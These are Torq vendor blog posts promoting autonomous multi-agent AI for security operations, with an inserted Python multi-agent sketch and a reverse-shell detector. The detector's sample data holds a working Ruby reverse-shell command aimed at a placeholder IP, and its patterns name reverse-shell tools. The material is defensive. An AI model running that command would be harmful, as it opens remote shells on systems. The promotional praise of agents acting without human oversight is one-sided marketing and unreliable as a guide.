SecOps Automation: How Lean Teams Can Achieve Enterprise-Level Security

The modern threat landscape doesn’t scale down just because your team is lean. Whether you’re a two-person SecOps crew or a full-blown SOC, attackers don’t discriminate — and the alerts don’t stop.

Small security teams face the same phishing, ransomware, and insider threats as the world’s largest enterprises — only with fewer hands on deck and less time to respond.

To level the playing field, teams are turning to SecOps automation. With the right platform, automated SecOps lets lean teams move like fully-resourced ones — cutting through alert noise, accelerating response, and running workflows autonomously.

Traditional SecOps Is Broken

Most security teams today are running on fumes. Threats are increasing, tools are multiplying, and analysts are stuck in an endless loop of triage and tuning as they face:

  • Too many alerts, not enough analysts: Security teams are drowning in noise. With limited headcount, it’s impossible to investigate everything, causing critical alerts to go unnoticed.
  • Poor tool integration: 51% of security leaders say their tools don’t integrate well, creating silos, manual handoffs, and slower response times.
  • Busywork over threat work: 46% of teams spend more time configuring and troubleshooting tools than mitigating threats. Another 59% say maintaining tools is the #1 inefficiency in their SOC.

It’s not sustainable — especially for lean teams.

Why Lean Teams Need SecOps Automation

Lean security teams are under pressure to deliver big results — without the benefit of big budgets, big headcount, or big enterprise infrastructure. They face the same volume of threats, alerts, and compliance requirements as a Fortune 500 but with a fraction of the resources.

SecOps automation bridges this resource gap. Deterministic automation workflows are ideal for the most common, repetitive, or predictable tasks, while non-deterministic workflows — augmented by agentic AI — enable understaffed SOC teams to handle more complex, multi-step security use cases more quickly and move towards an autonomous SOC.

SecOps automation significantly reduces manual effort, accelerates threat response times, and empowers lean teams to run high-performance SOCs without the overhead a traditional SOC carries.

Five Ways Automated SecOps Helps Level the Playing Field

1. Phishing

Phishing is the most common form of cybercrime, with an estimated 3.4 billion spam emails sent daily. Each suspicious email requires triage, enrichment, investigation, and user outreach. Multiply that by dozens (or hundreds) of alerts a day, and you’re looking at full-blown burnout.

Automated SecOps turns phishing response into a self-contained workflow. From inbox monitoring and URL detonation to IOC lookups and automated takedowns, the entire lifecycle can be handled in minutes — not hours — without ever touching the analyst queue.

2. Threat Intelligence Enrichment

Threat intel is only useful if it’s fast, contextual, and operationalized — three things that don’t happen when analysts are manually switching between threat feeds and enrichment tools.

With SecOps automation, threat enrichment happens automatically. As alerts are ingested, automation pulls relevant context from multiple intel sources, correlates them with local data, and attaches insights to each case. That gives analysts a complete picture from the start.

3. Incident Response

Manual incident response is slow, error-prone, and hard to scale, especially with limited staff. Analysts have to piece together clues from multiple systems, coordinate handoffs, and manually document every action. For lean teams, it’s a recipe for delays and missed steps.

Automated incident response changes the game. As soon as an incident is detected, workflows kick off to contain the threat, collect forensics, notify stakeholders, and even auto-resolve based on pre-approved playbooks. With agentic AI in the loop, you can even triage, investigate, and remediate without any human intervention.

4. Vulnerability Management (VM)

Prioritizing which vulnerabilities matter is half the battle. But manually scanning assets, matching vulnerabilities to context, and assigning follow-up tasks can take days — assuming it gets done at all.

Automated SecOps streamlines the entire VM lifecycle. It ingests scanner output, correlates it with asset data, flags exploitable vulnerabilities, and initiates remediation workflows based on risk level — all without human touch. Analysts get real-time visibility into what’s fixed, what’s pending, and what’s critical.

5. Identity and Access Management (IAM)

Access creep and reused credentials are an open door for attackers — but they’re often overlooked because IAM tasks are tedious and time-consuming.

With automation, IAM becomes hands-free. Just-in-time access, automatic revocation, and periodic audits all run behind the scenes. You can even automate a response to suspicious activity, like impossible travel or privilege escalation, before an attacker has time to act.

SecOps Automation = Big Results for Lean Teams

Built for all skill levels: Low-code and no-code automation platforms have lowered the barrier to entry for security teams, making it easier for them to implement and manage security solutions. Analysts can build and deploy workflows without needing to write a single line of code, while more technical users can dig into scripting and APIs when needed. This flexibility empowers teams to move faster and focus on strategy instead of syntax.

Faster time to value with pre-built workflows: Many SecOps automation platforms offer prebuilt workflows for common use cases like phishing response and alert triage. These templates help teams launch fast, then iterate and customize for their environment.

Unified dashboards and reporting: Effective SecOps automation isn’t just about doing more — it’s about seeing more. Automation platforms often include built-in dashboards, visual workflow builders, and custom reporting tools that make it easier to track performance, prove value, and drive continuous improvement.

More use case coverage: Automation isn’t limited to incident response. Mature SecOps teams extend it to vulnerability management, insider threat detection, access controls, compliance audits, and even IT workflows like onboarding or offboarding. The more you automate, the more time your team has for strategic work.

Fully integrated AI access: It’s no secret that AI is the big hot ticket item in the cybersecurity industry. However, most organizations are diligently evaluating and carefully choosing when and where to deploy AI in their security stack — and rightfully so. 

Whether you are slow-rolling AI access due to budget constraints or still building a business case to demonstrate the value of AI in the SOC to upper management, a SecOps automation platform provides a unique, centralized hub that fully integrates with every security solution, ensuring consistent and controlled AI access across your entire security environment.

Torq: The Leading Platform for SecOps Automation

Torq HyperSOC™ is the agentic AI-driven platform explicitly designed to empower lean security teams with extensive SecOps automation capabilities. Torq delivers:

  • Multi-Agent AI: Torq’s Socrates orchestrates automated workflows across specialized AI agents, seamlessly handling phishing triage, malware containment, IAM hygiene, and more.
  • Natural language workflows: No-code and low-code interfaces allow teams to launch and modify workflows simply by describing their intent, significantly accelerating adoption and effectiveness.
  • Rapid integration: Instant, seamless integrations across the entire security ecosystem eliminate silos, ensuring workflows operate fluidly across tools like AWS, Azure, Okta, SentinelOne, and many more.
  • Autonomous response: From detection to containment and remediation, Torq autonomously manages threats, dramatically reducing response times and enabling analysts to focus on high-impact tasks.

What SecOps Automation Looks Like

Torq customers consistently report transformative impacts from automating SecOps.

Check Point

Check Point’s SOC faced a crushing alert load and a 30–40% manpower gap, until Torq HyperSOC™ came into the picture. Within days, Torq deployed over two dozen AI-driven playbooks that automated repetitive tasks, reduced alert fatigue, and enabled autonomous remediation for low-level threats. Now, analysts are empowered to focus on what matters, with NLP-powered case insights helping them make faster, smarter decisions.

Global Retailer

This global fast-fashion giant replaced its legacy SOAR with Torq Hyperautomation™ to streamline security operations, cut alert fatigue, and simplify complex workflows across international teams. By automating end-user requests, case management, and just-in-time access, they reduced ticket resolution from days to minutes and saved a week of time per request.

Lennar

Lennar’s SOC team replaced XSOAR with Torq to eliminate manual phishing remediation: cases that used to take hours are now resolved in minutes. With no-code and AI-powered workflow building, analysts of all skill levels can build automations and refocus on proactive threat hunting. Torq’s flexibility and speed also helped streamline asset management, cutting hours of work down to just minutes.

Scale Your Security Without Scaling Your Team

Torq HyperSOC™ enables lean teams to protect their businesses at enterprise scale, with automated SecOps workflows that eliminate manual drudgery, reduce response times, and enable analysts to focus on strategic threat hunting and high-value tasks.

Want to scale your security operations with Torq? Get a demo. And check out our Field CISO’s guide with practical advice for a more efficient SOC.

The AI SOC Analyst That Offloads 90%+ of Tier-1 Cases — Meet Socrates

Security Operations Centers (SOCs) continue to struggle in 2025. The perfect storm of growing alert volume, consistent talent shortage, and the well-documented limitations of legacy SOAR solutions has brought many SOC teams to a breaking point. At the same time, bad actors continue to innovate, and cybercriminals have become more sophisticated in their tactics and techniques, including using AI to launch attacks at scale.

Fortunately, AI in the SOC has begun to revolutionize the security operations field, specifically in the area of Tier-1 security analysis. According to Gartner, “By 2026, AI will increase SOC efficiency by 40% compared with 2024 efficiency, beginning a shift in SOC expertise toward AI development, maintenance and protection.”

Why the SOC Needs an AI Analyst

As alert complexity rises, so does burnout and alert fatigue. SOC analysts today spend too much time sifting through noise and manually triaging alerts, rather than taking action to proactively secure the environment. According to the 2024 SANS Detection and Response Survey, more than half of security teams say false positives are a huge problem, and 62.5% are overwhelmed by sheer data volume. 

A major reason for this frustration is that security teams are fighting with their own tools. In its State of Security 2025 report, Cisco’s Splunk surveyed over 2,000 security professionals in its community and found:

  • 59% spend too much time and/or effort maintaining tools and associated workflows
  • 51% admit their tools do not integrate well with one another
  • 47% face alerting issues
  • 32% of teams do not have the requisite skills to be efficient in the SOC

Tier-1 alert triage is overwhelming. Analysts face tens of thousands of Tier-1 alerts per day, and on average, security analysts are only getting to half of the alerts they’re supposed to review. Combined with these SOC inefficiencies, the volume becomes too high for human-only triage. As a result, detection and response times suffer. Gartner says, “AI agents are emerging as a critical solution to enhance efficiency, reduce burnout, and enable teams to focus on strategic initiatives.” 

Enter Torq Socrates — the agentic AI SOC Analyst designed to dramatically offload Tier-1 workloads and lead organizations toward an autonomous SOC. 

What Is Torq Socrates?

Socrates is Torq’s agentic AI SOC Analyst — a self-deterministic, autonomous AI Agent that plans, reasons, and acts the way a human SOC analyst would. Unlike SOAR solutions or common Generative AI chatbots, Socrates does not require human instruction or guidance. Socrates understands the SOC objectives and executes complex actions with minimal oversight.

Legacy SOAR and generic workflow automation solutions offer AI chatbots that run on static, rule-based playbooks — controlled by human input. And, while GenAI augments case triage by generating context to help reduce detection and response times, it is still largely reactive and reliant on human analysts to instruct, guide, and manually trigger remediation actions. Agentic AI, on the other hand, represents the next leap towards a more autonomous SOC.

According to IDC’s latest report, agentic AI has enormous potential in cybersecurity as it can process and solve problems the way a human being would. Socrates isn’t reactive — it’s adaptive. To continuously improve and evolve with new threats, Socrates uses: 

  • Semantic memory to understand prompts and take explicit action
  • Episodic memory to learn from past incidents to develop new strategies
  • Procedural memory to make decisions on which tools to use and which data to gather

The Anatomy of Socrates: Torq’s OmniAgent

Socrates is more than just a single AI Agent. Socrates sits at the helm of Torq’s Multi-Agent System (MAS), acting as an OmniAgent in charge of coordinating multiple specialized AI Agents. Each of these agents is trained to perform a specific task, and is capable of using sophisticated iterative planning and reasoning to solve complex, multi-step problems autonomously. Torq’s AI Agents include: 

  • Runbook Agent: Autonomously plans and adapts incident response runbooks with a deep knowledge and understanding of the environment.
  • Investigation Agent: Performs deep-dive investigations in seconds, uncovering hidden patterns across disparate data sources and tools to pinpoint root causes and assess threat impact.
  • Remediation Agent: Executes remediation actions, closing the loop with verifiable outcomes, either by autonomously following the associated runbook or through human-in-the-loop response.
  • Case Management Agent: Gathers real-time and historical data, organizes case timelines, highlights key indicators, and reprioritizes incidents based on evolving information.

This agentic AI architecture is supported by first-in-class Retrieval-Augmented Generation (RAG) and Model Context Protocol (MCP) technology that helps the Torq MAS dynamically accelerate SecOps outcomes by improving detection and triage accuracy, while reducing MTTD and MTTR.

How an AI SOC Analyst Performs Tier-1 Tasks

So, how does Socrates leverage Torq’s MAS to perform Tier-1 security tasks? Let’s look at this Command and Control attack detected by CrowdStrike and see how tasks previously handled by human analysts are now handled with unprecedented efficiency by Torq’s AI SOC Analyst, Socrates.

Watch Socrates, Torq’s AI SOC Analyst, following the guidelines in a SOC runbook to triage a case automatically.

1. Automatic Runbook Analysis

When a security event arises, an analyst traditionally consults a “runbook” – a guide specifying the response to that specific type of event. Today, these “runbooks” exist in all modern SOCs and are prepared by senior architects to benefit Tier-1 and Tier-2 analysts.

Torq Socrates looks at outcomes of historical cases and associates the appropriate runbook based on the observables of the new case. Socrates automatically analyzes runbooks written in natural language, typically containing step-by-step procedures for handling various security incidents. By analyzing the semantic meaning of the natural language instructions, the AI SOC Analyst derives action flow from the recommended response strategies for different security events.

The associated case remediation runbook is written in natural language that Socrates analyzes, “understands,” and can follow.

2. Deep Research Incident Investigations

The many security tools available in the arsenal of Tier-1 SOC analysts can return a large amount of detailed information. The analyst’s goal is to synthesize this information into a decision about which next steps to take, according to the runbook’s guidance. 

Just as human analysts rely on insights from the runbook, Socrates can assist in automating investigation or even incident response tasks. This includes executing tasks such as alert triage, data enrichment, containment, and remediation actions, which speeds up response times and reduces the manual effort required from human analysts.

An agentic AI SOC Analyst like Socrates excels at processing both structured and unstructured security tool data. This enables it to analyze complex information and create dynamic decision trees based on runbook analysis. These decision trees adapt to the specific context of each incident, allowing for more efficient and accurate incident handling. For example, Socrates can determine: Is the file malicious? Is the user a very important person (VIP)? Is the activity frequent or infrequent during a specific time period indicating anomalous behavior?

Socrates utilizing CrowdStrike, VirusTotal, and a deep understanding of the organization’s environment to query observables and distill the relevant information.

3. Knowledge of Security Frameworks for Context

More experienced alert triage specialists bring their own contextual knowledge and understanding of networking, endpoint architecture, and attack techniques into the mix.

AI Agents are trained on an immense body of natural language documents containing information about the above and more. This allows the semantic analysis of an AI Agent to match the observed output of a security tool to the technique described in a documented framework, such as the MITRE ATT&CK framework.

Using the above technique, Torq’s agentic AI SOC Analyst, Socrates, leverages the information available in numerous documents describing attack frameworks, such as the MITRE ATT&CK framework, and maps its tactics and techniques to the outcomes observed in the analyzed security event.

Intelligent modeling with Torq’s AI SOC Analyst Socrates enables it to mimic a human-like thinking process, correlating information efficiently and mapping the appropriate outcomes to common frameworks like the MITRE ATT&CK framework, NIST, and more.

4. Leveraging Hyperautomation to Perform Designated Remediation Actions

The next step for a human analyst is to carry out the remediation actions outlined in the runbooks, choosing the proper tool and executing the instructions.

Based on the content of the runbook, the AI SOC Analyst uses its semantic analysis capabilities to suggest and trigger suitable Hyperautomated workflows and security tools from those explicitly made available within the Torq platform. These workflows align with the specific steps outlined in the natural-language document.

Torq Socrates performing the initial actions within the runbook.

5. Intelligent Case Management and Documentation

An important pillar of any operational practice is the meticulous documentation of all actions taken, decisions, and achieved outcomes. 

AI Agents have proven to be efficient at summarizing large amounts of natural language text. Torq Socrates leverages this capability to summarize the “conclusions” and desired next steps, and document them in the “case timeline”. Socrates then reaches back into its toolbox and ability to take action autonomously, marking the case as “closed” and moving the case forward without any human intervention.

Torq Socrates summarizing the findings of the security event and the actions taken, and automatically adding them to the timeline in Torq’s built-in ticket management system.

How Security Teams Use Socrates Today

Gartner forecasts that by 2028, multi-agent AI in threat detection and incident response will rise from 5% to 70%. For Torq customers leveraging Socrates, this is already their reality.

“I believe the successful use of Torq Agentic AI in SOC operations shows up in practical outcomes. With Torq Agentic AI, the answer is yes to questions such as: Are analysts happier? Are they sticking around? Do they have time to focus on more interesting and complex investigations? Are MTTM and MTTR lower? Torq Agentic AI extends and enhances our team so it can make better decisions more quickly — resulting in stronger security all around.”

Mick Leach, Field CISO, Abnormal Security

Socrates isn’t just another tool — it’s another teammate. And it’s changing the way security gets done. With Socrates, security decisions are made with context, fully automated incident response becomes the default, and agentic AI becomes the connective tissue across previously siloed security solutions, enabling SOC teams to move from human-in-the-loop to human-on-the-loop.

According to IDC, Torq HyperSOC, powered by Socrates, helps:

  • Eliminate over 95% of Tier-1 analyst workload
  • Reduce time-to-remediation by 90%
  • Increase case handling capacity 3-5x with zero added headcount

Torq Socrates is designed to handle Tier-1 triage actions by mapping the tasks and activities of human Tier-1 analysts to use cases leveraging agentic AI. With Torq Socrates as their AI SOC Analyst, human security analysts remain in charge of processes and outcomes while introducing dramatic new efficiencies and incident response accuracy, alleviating security analysts’ most critical challenges.

Want to meet Socrates? Request a demo. And get the AI or Die Manifesto to learn strategic considerations and CISO advice for deploying AI in your SOC. 

The Multi-Agent System: A New Era for SecOps

Security teams face mounting pressure to defend against sophisticated cyber threats. Traditional automation strategies are often rigid, reactive, and lack the ability to scale effectively. Many SOCs already have access to generative AI to assist with simple tasks and now Torq has brought agentic AI into the mix — which thinks, acts, and learns autonomously to handle security risks. What’s next? 

A multi-agent system (MAS) represents the next era for SecOps: specialized AI agents that work together to solve problems. Each AI agent has a specific role that it is responsible for executing, and together, this system of agents collaborates to achieve a common goal.

Let’s explore what a multi-agent system is, why it’s essential for SecOps, and how Torq leverages multi-agent AI to redefine security operations.

What Is a Multi-Agent System?

A multi-agent system is a network of artificially intelligent software agents working collaboratively to achieve complex, multi-step goals, often orchestrated by an OmniAgent, or “Super Agent”. Unlike monolithic automation tools, each agent within the system operates autonomously, specializing in specific tasks and communicating seamlessly to coordinate actions.

Multi-agent systems comprise three key components: the individual AI agents themselves, a communication framework, and a control structure that governs how agents interact. These smaller, focused agents that perform specific tasks break down complex security operations into manageable pieces.

Why Multi-Agent AI Outperforms Single AI Agents

Scalability: A MAS enables multiple agents to work simultaneously across tasks — unlike traditional automation that handles events sequentially. This parallel approach dramatically increases operational speed and resilience.

Specialization: Rather than relying on broad workflows, multi-agent AI deploys specialized agents that are experts in their roles. This ensures every security incident receives expert-level attention explicitly tailored to its context.

Collaborative Learning: Multi-agent systems leverage AI reasoning to improve continuously. They learn from incidents, adapt to changing threats, and refine their workflows automatically, enabling ongoing evolution and enhanced security posture.

Cost Savings: By breaking down responsibilities into smaller specialized tasks, the workload and resource consumption of the AI system is more efficiently distributed, resulting in a less costly AI implementation. Rather than a single general-purpose AI chatbot working step by step through a problem, the parallel execution of bite-sized tasks helps save the SOC money in the long run. 

How Do Multi-Agent AI Systems Work in the SOC?

In a MAS, each agent operates independently, making its own decisions based on its specific role, environment inputs, and communication with other agents.

Here’s how a typical multi-agent system operates:

  • Autonomy: Each agent can act independently without needing centralized control.
  • Specialization: Agents are assigned specific functions (e.g. triage, investigation, remediation, etc.) based on their unique capabilities and expertise.
  • Communication and coordination: Agents share information, either directly or through a central, orchestrating OmniAgent, to align activities, correlate relevant data, and avoid conflicts.
  • Parallel execution: Multiple agents work simultaneously, dramatically accelerating task completion compared to linear automation models.
  • Adaptability: Agents dynamically adjust their behavior in response to real-time inputs, changes in the threat landscape, or evolving priorities.
  • Emergent behavior: Through collaboration, the system can achieve more sophisticated outcomes than any single agent.
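A minimal sketch of the three MAS components described above (independent agents, a communication framework, and a control structure), written here as an added example and not Torq's own code. An orchestrator runs a triage agent and an investigation agent in parallel, merges their findings, and then a hypothetical runbook policy decides whether remediation runs autonomously or is held for a human (human-on-the-loop); the lookup tables, policy, and sample cases are all constructed.

```python
from concurrent.futures import ThreadPoolExecutor
from dataclasses import dataclass, field

# Constructed lookup tables standing in for threat-intel and identity sources.
KNOWN_BAD_HASHES = {"0f1e2d3c4b5a69788796a5b4c3d2e1f0"}  # constructed sample hash
VIP_USERS = {"cfo@example.com"}                             # constructed
# Hypothetical control structure: what the system may do without a human.
RUNBOOK_POLICY = {
    "autonomous_remediation_max_severity": "medium",  # high/critical need approval
    "never_autonomous_for_vip": True,
}
SEVERITY_RANK = {"low": 0, "medium": 1, "high": 2, "critical": 3}


@dataclass
class Case:
    case_id: str
    observables: dict
    findings: dict = field(default_factory=dict)
    timeline: list = field(default_factory=list)
    status: str = "open"

    def log(self, agent, message):
        # The shared timeline is the agents' communication record.
        self.timeline.append(f"[{agent}] {message}")


# --- Specialized agents: each sees the case and returns only its own findings ---

def triage_agent(case):
    """Assign a heuristic severity from raw observables (constructed thresholds)."""
    conns = case.observables.get("outbound_connections", 0)
    if conns >= 100:
        return {"severity": "high"}
    if conns >= 10:
        return {"severity": "medium"}
    return {"severity": "low"}


def investigation_agent(case):
    """Enrich observables against intel and identity data (constructed lookups)."""
    return {
        "hash_malicious": case.observables.get("file_hash") in KNOWN_BAD_HASHES,
        "user_is_vip": case.observables.get("user") in VIP_USERS,
    }


def remediation_agent(case):
    """Decide between autonomous containment and human-on-the-loop approval."""
    sev = case.findings["severity"]
    if case.findings["hash_malicious"]:
        sev = "critical"  # confirmed malware overrides the heuristic triage score
    case.findings["severity"] = sev
    max_auto = SEVERITY_RANK[RUNBOOK_POLICY["autonomous_remediation_max_severity"]]
    vip_block = RUNBOOK_POLICY["never_autonomous_for_vip"] and case.findings["user_is_vip"]
    if SEVERITY_RANK[sev] <= max_auto and not vip_block:
        return {"action": "isolate_host", "mode": "autonomous"}
    return {"action": "isolate_host", "mode": "pending_approval"}


def case_management_agent(case, remediation):
    """Record the outcome on the timeline and set the final case status."""
    case.status = "closed" if remediation["mode"] == "autonomous" else "awaiting_human_approval"
    case.log("case_mgmt", f"severity={case.findings['severity']} "
                          f"action={remediation['action']} mode={remediation['mode']}")
    return case.status


# --- OmniAgent: the orchestrator that owns communication and control ---

def omni_agent(case):
    """Run independent agents in parallel, merge findings, then gate remediation."""
    with ThreadPoolExecutor(max_workers=2) as pool:
        futures = {name: pool.submit(fn, case)
                   for name, fn in (("triage", triage_agent),
                                    ("investigation", investigation_agent))}
        for name, fut in futures.items():  # merge in a single thread, no shared writes
            result = fut.result()
            case.findings.update(result)
            case.log(name, str(result))
    remediation = remediation_agent(case)
    case.log("remediation", str(remediation))
    return case_management_agent(case, remediation)


if __name__ == "__main__":
    sample = Case("C-1", {"file_hash": "0000", "user": "dev@example.com",
                          "outbound_connections": 3})  # constructed case
    print(omni_agent(sample))
    print("\n".join(sample.timeline))
```

The point a defender should take from the control structure is that the policy, not the agents, decides what runs unattended; confirmed malware and VIP involvement both fall back to a human here.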

Multi-Agent System Use Cases In the SOC

Alert Triage at Scale

With a Multi-Agent System, autonomous agents can instantly evaluate thousands of incoming alerts, enrich them with context, and determine severity using internal telemetry and threat intel sources. Instead of drowning analysts in false positives, MAS filters out noise and flags what actually matters. This dramatically reduces Mean Time to Remediate (MTTR) and frees up security teams to focus on high-value investigations.

Runbook Orchestration

Building and maintaining runbooks shouldn’t require a dev team. Multi-agent systems enable no-code orchestration of complex workflows that span cloud platforms, identity providers, SIEMs, EDRs, and more. Security teams can define desired outcomes in natural language, and AI agents translate those into structured, executable playbooks. This accelerates time-to-value, eliminates human error, and ensures consistent, repeatable outcomes without code dependencies.

Incident Response

A Multi-Agent System coordinates the investigation, containment, remediation, and closure of a case as a single, seamless operation. Each agent specializes in a specific role for triage, root cause analysis, identity verification, and remediation, working in parallel under the direction of an OmniAgent. Threats are resolved faster, response is consistent, and your SOC operates like a finely-tuned machine.

Threat Hunting

Proactive threat-hunting agents continuously monitor activity across your environment, looking for behavioral anomalies, pattern deviations, or signals buried in noise. These agents correlate telemetry from endpoints, cloud assets, and user behavior to surface suspicious activity. They initiate investigations automatically, escalating only when human insight is required.

The World’s First Multi-Agent System for The SOC

Torq is the first cybersecurity platform to launch a true Multi-Agent System (MAS) purpose-built for the SOC. Torq HyperSOC™’s MAS architecture deploys a team of specialized, autonomous AI Agents, coordinated by Socrates, our OmniAgent, to execute complex SecOps workflows in parallel, at scale, and without human intervention. Meet Torq’s AI Agents. 

Socrates, the AI SOC Analyst 

Socrates is the OmniAgent mastermind that serves as the command center for all other agents. It interprets high-level goals and directives and then orchestrates the appropriate sequence of AI Agents to execute the task with precision. Socrates understands natural language, so human SOC analysts can kick off complex investigations or remediation plans with simple prompts. It turns strategic intent into scalable, autonomous action.

Runbook Agent

The Runbook Agent is the architect of execution. It takes strategic objectives, like responding to phishing, escalating ransomware alerts, or handling IAM requests, and maps them to dynamic, modular workflows. This agent builds the execution plan, delegates tasks to specialized agents, and ensures every step adheres to security policy and best practices. It enables your SOC to execute with precision, speed, and zero guesswork.

Investigation Agent

When context is critical, the Investigation Agent takes over. It digs deep into alert data, pulling from internal logs, threat intelligence platforms, CMDBs, and identity systems to uncover the root cause of a threat. It correlates signals, identifies attack paths, and enriches cases with detailed findings. This agent handles the heavy lifting, allowing human analysts to focus on informed decision-making.

Remediation Agent

Once a threat is validated, the Remediation Agent initiates the full response lifecycle, from isolating endpoints and revoking credentials to updating firewall rules and notifying affected users. It acts decisively and autonomously to contain incidents and restore normal operations without waiting for human intervention.

Case Management Agent

The Case Management Agent automatically compiles case summaries, prioritizes incidents based on business impact and severity, and routes alerts to the right stakeholders. It also captures analyst actions and decisions to maintain clean audit trails and feed the system’s memory for more intelligent responses over time. This agent transforms raw alerts into structured, actionable intelligence.

In Torq HyperSOC™, each AI Agent specializes in a core security function — and together, they operate as an intelligent, coordinated, tireless SOC workforce. This collaborative multi-agent AI architecture eliminates bottlenecks, accelerates response, and drives precision at scale, transforming reactive SOCs into proactive, autonomous security operations.

The Future of SecOps: The Autonomous SOC Powered by Multi-Agent AI

The security industry has outgrown one-size-fits-all automation. Torq’s Multi-Agent System offers a new path forward: agentic AI that works in tandem, orchestrated by Socrates, to transform your SOC from reactive to autonomous. But Torq’s latest advancements truly push our MAS into next-gen territory.

Retrieval-augmented generation (RAG) enhances Torq’s MAS by giving our AI Agents access to private and external knowledge bases. That means every decision is made with the most current, relevant intelligence. RAG enhances everything from case enrichment and threat correlation to report generation, enabling smarter, faster response without sacrificing accuracy.

Model-Context Protocol (MCP) is another Torq game-changer. Torq is the first autonomous SOC platform to natively support MCP, which guarantees AI decisions are grounded in the exact context of your environment. This ensures precise, verifiable actions based on your organization’s specific infrastructure, data, and threat landscape.

Together, these advancements bring Torq’s vision to life: a truly autonomous SOC where AI handles the heavy lifting and humans stay in control as strategic decision-makers. 

See the world’s first true Multi-Agent System for the SOC in action.


Quiz: Which Torq AI SOC Agent Has Your Back?

Still chasing alerts manually? That’s what a multi-agent system is for.

Take this quiz to discover which AI agent in Torq HyperSOC™ is taking the tactical weight off your plate — so you can focus on what really matters.


Three SOC Threats Solved in Minutes with Torq Hyperautomation


Your SOC exists for one core reason: to rapidly reduce the mean time to detect, investigate, and respond to threats. The more efficiently your team operates, the faster you reduce essential KPIs like MTTR, MTTD, MTTI, and what we call ‘MTTx’ (mean time to anything).

Ask our Field CISO, Patrick Orzechowski (PO), and he’ll tell you straight: If your SOC isn’t relentlessly focused on reducing risk through speed, you’re falling behind.

Talking about efficiency is easy. Actually achieving it, especially when your SOC is drowning in alerts and your analysts are burning out, is another story entirely.

The solution lies in combining Hyperautomation, agentic AI, and intelligent case management. Below, we break down three use cases where Torq HyperSOC™ and Socrates, the AI SOC Analyst, reduce MTTR to just minutes.

The SOC Efficiency Challenge

If you’ve spent time in a SOC, these pain points are familiar:

  • Alert fatigue: Over half of security teams struggle with false positives and data overload.
  • Endless tickets: Legacy ticket systems and disjointed shift handoffs bog down response times.
  • Manual swivel-chairing: Analysts lose precious hours jumping between tools and logs.
  • Manual enrichment: Manually pulling threat intel and context is a major time-sink.

These pain points slow your team’s reaction times and increase risk. But these barriers disappear when Hyperautomation, AI, and smart case management are unified. 

Use Case #1: Neutralize a Reverse Shell Command & Control (C2) Attack 

When a Ruby-powered reverse shell (courtesy of njRAT) targeted an EC2 Linux instance, Socrates got to work. As Torq HyperSOC’s Omniagent, Socrates detected anomalous process behaviors and network connections, flagging the reverse shell command within seconds.

Without waiting for analyst input, Socrates quarantined the EC2 host. The platform harvested file hashes, process trees, and destination IPs, then enriched them via threat intel feeds and internal CMDB lookups.

Through a deep understanding of the environment and analysis of the remediation runbook associated with the detected use case, Socrates autonomously killed the malicious process in its tracks before the bad actor was able to spread laterally, exfiltrate sensitive data, or cause any further damage.

In under two minutes, the HyperSOC dashboard included an AI-generated incident report with prioritized next steps and detailed documentation of every AI-driven action taken. 

Result: The threat was detected and neutralized without manual intervention, allowing analysts to move swiftly to higher-priority tasks.

Torq HyperSOC™ detected and neutralized a Ruby-based njRAT attack on an EC2 Linux instance in under two minutes.
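The detection described above rests on two observable signals: a reverse-shell command line, and an interactive shell holding an outbound connection to an address it has no business talking to. The following is an added example, not Torq or HyperSOC code, that implements those two checks in Python over constructed process events. The event schema, the RFC 1918 definition of "internal", and the pattern list are assumptions to adapt to your own EDR telemetry.

```python
"""Reverse-shell heuristics over process events.

Added example, not Torq or HyperSOC code. The event records below are
constructed to resemble an EDR process-start event joined with the
process's outbound connection; they are not real njRAT telemetry.
"""
import re
from ipaddress import ip_address, ip_network

# Command-line fragments that wire an interpreter's or shell's stdio to a
# socket. Each is a piece a defender expects in a reverse-shell one-liner.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"\bruby\b.*-rsocket\s+-e"),                 # ruby -rsocket -e '...'
    re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+"),    # bash -i >& /dev/tcp/IP/PORT
    re.compile(r"\bnc\b.*\s-e\s+/bin/(?:ba)?sh"),           # nc -e /bin/sh
    re.compile(r"\bpython\d?\b.*-c\b.*socket.*subprocess"), # python -c 'import socket,subprocess...'
    re.compile(r"\bsocat\b.*exec:"),                        # socat ... exec:/bin/sh
]

SHELL_IMAGES = re.compile(r"/(?:sh|bash|dash|zsh)$")

# RFC 1918 space; assumption: anything else counts as "external" for this demo.
INTERNAL_NETS = [ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]


def is_external(ip: str) -> bool:
    addr = ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def score_event(event: dict) -> dict:
    """Return a verdict for one event.

    Assumed keys: host, pid, image, cmdline, dst_ip, dst_port (dst_* may be None).
    Two independent signals are checked: a known reverse-shell command line,
    and an interactive shell binary holding a connection to a non-RFC1918 address.
    """
    reasons = []
    cmd = event.get("cmdline", "")
    for pat in REVERSE_SHELL_PATTERNS:
        if pat.search(cmd):
            reasons.append(f"cmdline matches {pat.pattern!r}")
            break
    dst = event.get("dst_ip")
    if dst and is_external(dst) and SHELL_IMAGES.search(event.get("image", "")):
        reasons.append(f"shell {event['image']} connected out to {dst}:{event.get('dst_port')}")
    return {"host": event["host"], "pid": event["pid"], "suspicious": bool(reasons), "reasons": reasons}


def find_reverse_shells(events: list) -> list:
    """Verdicts for every event that tripped at least one signal, in input order."""
    return [v for v in (score_event(e) for e in events) if v["suspicious"]]


# Constructed sample telemetry (not real data).
SAMPLE_EVENTS = [
    {"host": "ip-10-0-1-23", "pid": 4182, "image": "/usr/bin/ruby",
     "cmdline": "ruby -rsocket -e 'c=TCPSocket.new(\"203.0.113.45\",4444);"
                "while(l=c.gets);IO.popen(l,\"r\"){|io|c.print io.read};end'",
     "dst_ip": "203.0.113.45", "dst_port": 4444},
    {"host": "ip-10-0-1-23", "pid": 4190, "image": "/usr/bin/ruby",
     "cmdline": "ruby /opt/app/worker.rb", "dst_ip": "10.0.2.15", "dst_port": 5432},
    {"host": "ip-10-0-1-23", "pid": 4201, "image": "/bin/bash",
     "cmdline": "bash -i", "dst_ip": "198.51.100.7", "dst_port": 9001},
    {"host": "ip-10-0-1-23", "pid": 4210, "image": "/bin/bash",
     "cmdline": "bash /opt/app/deploy.sh", "dst_ip": None, "dst_port": None},
]

if __name__ == "__main__":
    for verdict in find_reverse_shells(SAMPLE_EVENTS):
        print(verdict["host"], verdict["pid"], "; ".join(verdict["reasons"]))
```

The benign Ruby worker and the deploy script are there on purpose: a detection that only keys on the interpreter name would page on both, which is the alert noise the rest of this page is about.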

